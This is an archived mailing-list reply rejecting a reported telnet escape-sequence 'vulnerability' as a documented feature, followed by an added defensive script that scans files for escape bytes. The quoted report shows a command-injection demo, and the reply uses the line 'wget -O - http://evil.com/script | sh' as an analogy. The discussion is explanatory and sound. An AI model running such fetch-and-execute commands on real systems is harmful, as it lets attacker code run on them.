
Re: [bug-inetutils] telnet security advisory


From: Simon Josefsson
Subject: Re: [bug-inetutils] telnet security advisory
Date: Mon, 03 Oct 2011 01:16:31 +0200
User-agent: Gnus/5.110018 (No Gnus v0.18) Emacs/23.2 (gnu/linux)

sha0 <address@hidden> writes:

> Hello,
>
> It is possible to inject an escape sequence via stdin to telnet, and arbitrary
> commands will be executed,

Hi!  Thanks for studying InetUtils for security problems.  I'm not sure
I follow your "attack" though.

> for example:
>
>
>  #  cat evil-file | telnet 127.0.0.1 80
> Trying 127.0.0.1...
> Connected to 127.0.0.1.
> Escape character is '^]'.
>
> telnet> !id
> uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)
> Connection closed by foreign host.
>
>
> I think it is very dangerous, despite the fact that few admins use telnet for
> moving files like this

Yes it is dangerous, so don't do that.  Use ftp to transfer files.

> 3. DESCRIPTION
> -------------------------
> When telnet is used to transfer files to a remote TCP port, a very dangerous
> vulnerability is present that allows remote arbitrary code execution.

The attack seems to be based on tricking the local root user into doing
something stupid.  This is similar to asking the local root user to do
'wget -O - http://evil.com/script | sh'.  There is no security bug in
wget or sh just because that is possible.

> 7. SOLUTION
> -------------------------
> The stdin parser must filter the 0x9d byte.

The ^] escape sequence is a documented feature, so I don't think that is
a solution.

You can use the command line parameter -E to inhibit the escape
character if you want.  Quoting 'telnet --help':

  -E, --no-escape            use no escape character

/Simon
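
A pre-flight check for the situation discussed in this message, as an added example that is not part of the original e-mail or of InetUtils: it scans a file for the escape byte before the file is fed to telnet on stdin, and always passes the `-E` option quoted above. The function names are hypothetical; the bytes checked are 0x1d (ASCII `^]`, the escape character shown in the banner) and 0x9d (the byte named in the quoted advisory).

```shell
#!/bin/sh
# Added example: check a file before piping it into telnet's stdin.
# Octal 035 = 0x1d (^], the default escape character in the banner);
# octal 235 = 0x9d (the byte named in the quoted advisory).

# Print how many escape-candidate bytes the file contains.
count_escape_bytes() {
    LC_ALL=C tr -cd '\035\235' < "$1" | wc -c | tr -d ' '
}

# Succeed (exit 0) only if the file contains none of those bytes.
is_safe_for_telnet_stdin() {
    [ "$(count_escape_bytes "$1")" -eq 0 ]
}

# Hypothetical wrapper: refuse flagged input, and use -E (--no-escape)
# so the client has no escape character even for input that passed.
send_file() {  # usage: send_file FILE HOST PORT
    if ! is_safe_for_telnet_stdin "$1"; then
        echo "refusing $1: contains telnet escape byte(s)" >&2
        return 1
    fi
    telnet -E "$2" "$3" < "$1"
}

# Demo on constructed sample input (not taken from the original message).
demo() {
    d=$(mktemp -d) || return 1
    printf 'GET / HTTP/1.0\r\n\r\n' > "$d/clean"
    printf 'abc\035def\n' > "$d/flagged"
    for f in clean flagged; do
        if is_safe_for_telnet_stdin "$d/$f"; then
            echo "$f: ok"
        else
            echo "$f: $(count_escape_bytes "$d/$f") escape byte(s) found"
        fi
    done
    rm -rf "$d"
}
demo
```

The check rejects any file containing those byte values, including binary data where they occur legitimately; for such files a transfer tool other than an interactive telnet client is the appropriate choice.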


